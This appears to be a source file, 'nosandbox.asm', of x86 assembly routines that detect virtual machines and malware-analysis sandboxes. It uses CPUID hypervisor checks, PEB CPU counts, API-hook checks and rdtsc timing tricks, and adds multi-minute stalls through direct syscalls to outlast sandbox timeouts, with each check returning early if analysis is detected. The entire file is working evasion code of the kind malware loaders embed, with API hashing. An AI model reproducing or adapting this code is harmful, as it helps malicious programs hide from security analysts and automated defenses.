/
nosandbox.asm
284 lines (236 loc) · 5.65 KB
/
nosandbox.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
; Should go to the end without RETing to win !
; ********************************************
; **
; ** Virtualisation Based
; **
; ********************************************
; Only allow Intel CPUS
%ifdef NOSB_INTELONLY
mov eax,0
cpuid
cmp edx,0x49656E69
je _isintel
ret
_isintel:
%endif
%ifdef NOSB_NOL1ICACHE
; Validate that you have L1 Cache.
mov edx,0
_isnot_nol1_first:
mov eax,4
mov ecx,edx
push edx
cpuid
pop edx
inc edx
mov ecx,eax ; Ecx will get Level
shr ecx,5
and ecx,7 ; Ecx get Level
and eax,0x1f ; Eax get type
cmp eax,2
jne _isnot_nol1_next ; Type 2 is Instruction
cmp ecx,1 ; we seek L1
je _isnot_nol1 ; Type2 L1 .. great !
_isnot_nol1_next:
inc ecx
loop _isnot_nol1_first ; if Type is not null do next cache
ret ; If here wi did'nt found L1 intruction cache.
_isnot_nol1:
%endif
%ifdef NOSB_HYPERBIT
; --------
; Test for Hypervised bit. ( Cpuid Leaf 1, 32th Bit)
mov eax,1
cpuid
bt ecx,31
jnc _isnot_hyper
ret
_isnot_hyper:
%endif
%ifdef NOSB_UNSLEAF
; --------
; Test for unsupported CPUid Leaf are not 0 on intel
mov eax,0x80000000
cpuid ; Should be at least ..5 since P4
cmp eax,0x80000005
jnb _isnot_Unleaf_mid
ret
_isnot_Unleaf_mid:
inc eax ; Unsuported leaf in EAX
push eax
xor eax,eax
cpuid
cmp ebx,0x756E6547 ; Test Intel String
pop eax
jne _isnot_Unleaf ; Work only with Intel
cpuid
add eax,ebx
add eax,ecx
add eax,edx
jnz _isnot_Unleaf
ret ; 0.0.0.0 on unsupported leaf
_isnot_Unleaf:
%endif
%ifdef NOSB_PEBCOUNT
; --------
; Test for PEB Cpu Count
mov ebx,[PEB]
mov eax,[ebx+0x64]
dec eax
jnz _isnot_pebuniq
ret
_isnot_pebuniq:
%endif
%ifdef NOSB_HYPSTR
; --------
; Test for Hypervisor String (Cpuid Leaf 0x400000000)
MOV EAX,0x40000000 ; leaf Hypervisor string
CPUID
MOV EAX,ECX
MOV ECX,0x4
_hyperstr_loopA: ; Test 4 Chars in ECX
CMP AL,32 ; Space
JB _isnot_hyperstr
CMP AL,122 ; "z"
JA _isnot_hyperstr
SHR EAX,8 ; Next Char
LOOP _hyperstr_loopA
mov ecx,4
MOV EAX,EBX
POP EAX
_hyperstr_loopB: ; Test 4 Chars in EAX
CMP AL,32
JB _isnot_hyperstr
CMP AL,122
JA _isnot_hyperstr
SHR EAX,8 ; Next Char
LOOP _hyperstr_loopB
ret ; Non printable Found
_isnot_hyperstr:
%endif
; ********************************************
; **
; ** Sandbox Detection Based
; **
; ********************************************
%ifdef NOSB_HOOKPROC
invokel _getdll,HASH_KERNEL32.DLL
invokel _getfunction, eax, HASH_WRITEPROCESSMEMORY
cmp dword [eax],0x8B55FF8B
je _nosbhookproc
ret
_nosbhookproc:
%endif
%ifdef NOSB_SYSSLEEP
jmp _syssleepstart
align 8
syssleepval dd - 10 * (10000 * 1000); en Sec
_syssleepstart:
push syssleepval ; Time to sleep
push 0 ; False, relative time selection
push _syssleepend ; Return address
push _syssleepend ; Return address emulate return to ntdelayexecution
mov eax,0x003b ; Only for XP32 Bits...
mov edx,esp ; See for code http://j00ru.vexillium.org/ntapi/
sysenter ; Hello Kernel
_syssleepend:
add esp, 4*3
%endif
%ifdef NOSB_HSLEEP
jmp _hsleepstart
align 8
hsleepval dd -1800000000
_hsleepstart
invokel _getdll,HASH_KERNEL32.DLL
invokel _getfunction, eax, HASH_NTDELAYEXECUTION
invokel eax, 0, hsleepval ; Negatif
%endif
%ifdef NOSB_CPUIDCOUNT
mov ecx,0xffff
push eax
_CPUID_LOOP:
push ecx
mov eax,1
cpuid
pop ecx
loop _CPUID_LOOP
rdtsc
pop ecx
sub eax,ecx
add eax,0x300000
push eax
mov ecx,0xffff
push eax
_CPUID_LOOP2:
push ecx
mov eax,1
nop
pop ecx
loop _CPUID_LOOP2
rdtsc
pop ecx
sub eax,ecx
pop ebx
cmp eax,ebx
ja _isnot_cpuidcount
ret
_isnot_cpuidcount:
%endif
%ifdef NOSB_RENAMED
invokel _getdll, HASH_NOSB_RENAMED.EXE ; Bloque les renommages
test eax,eax
jne _renamed_nosandbox
ret
_renamed_nosandbox:
%endif
%ifdef NOSB_ROGUEDLL
invokel _getdll, HASH_WS2_32.DLL
test eax,eax
jz _dll_nosandbox
ret
_dll_nosandbox:
%endif
; 3 Mn wait, with only 2 API Call.
%ifdef NOSB_RDTSCLOOP
jmp _rdtsc_start
_rdtscsleeploop:
rdtsc
mov ecx,eax
_timing1:
push ecx
cpuid ; Just a fake "Huge one"
rdtsc
pop ecx
cmp eax,ecx
jae _timing1
_timing2:
push ecx
cpuid
rdtsc
pop ecx
cmp eax,ecx
jb _timing2
ret
_rdtsc_start:
invokel _getdll,HASH_KERNEL32.DLL
invokel _getfunction, eax, HASH_GETTICKCOUNT
call eax
push eax
call _rdtscsleeploop
invokel _getdll,HASH_KERNEL32.DLL
invokel _getfunction, eax, HASH_GETTICKCOUNT
call eax
pop ebx
sub eax,ebx ; How many time a loop did...
mov ecx,eax
mov edx,0
mov eax,180000 ; 3 Mn en millisecondes
idiv ecx ; How many loop should i do
mov ecx,eax
dec ecx ; one loop is already done
_rdtscwait:
push ecx
call _rdtscsleeploop
pop ecx
loop _rdtscwait
%endif